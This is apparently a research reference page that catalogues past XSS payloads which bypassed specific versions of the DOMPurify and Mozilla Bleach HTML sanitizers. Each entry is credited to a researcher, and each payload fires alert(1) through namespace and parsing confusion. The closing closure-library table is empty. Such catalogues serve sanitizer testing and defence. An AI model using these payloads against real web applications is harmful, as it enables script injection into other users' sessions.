Payload examples

This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples, but to avoid redundancy we add only those that introduce new vectors or techniques.

DOMPurify

| Version | Payload | Credit | Additional links |
| --- | --- | --- | --- |
| 2.0.0 | `<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">` | Michał Bentkowski @SecurityMB | |
| 2.0.17 | `<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>` | Michał Bentkowski @SecurityMB | |
| 2.0.17 | `<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">` | Gareth Heyes @garethheyes | |
| 2.0.17 | `<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>` | @sqrtrev @0xParrot @web_payload team @GuesserSuper | |
| 2.2.0 | `<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">` | Daniel Santos @bananabr | |
| 2.2.3 | `<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">` | Michał Bentkowski @SecurityMB | |
| 3.0.8 | `<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">` | Kévin - Mizu @kevin_mizu | |
| 3.1.0 | ``n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;`` | N/A | |
| 3.1.7 | `<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.` | Masato Kinugawa @kinugawamasato | |

Mozilla Bleach

| Version | Payload | Credit | Additional links |
| --- | --- | --- | --- |
| 3.1.0 | `<noscript><style></noscript><img src=x onerror=alert(1)>` | Yaniv Nizry @YNizry | |
| 3.1.1 | `<svg><style><img src=x onerror=alert(1)>` | Yaniv Nizry @YNizry | |
| 3.2.3 | `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` | Yaniv Nizry @YNizry | |

Google closure-library

| Version | Payload | Credit | Additional links |
| --- | --- | --- | --- |
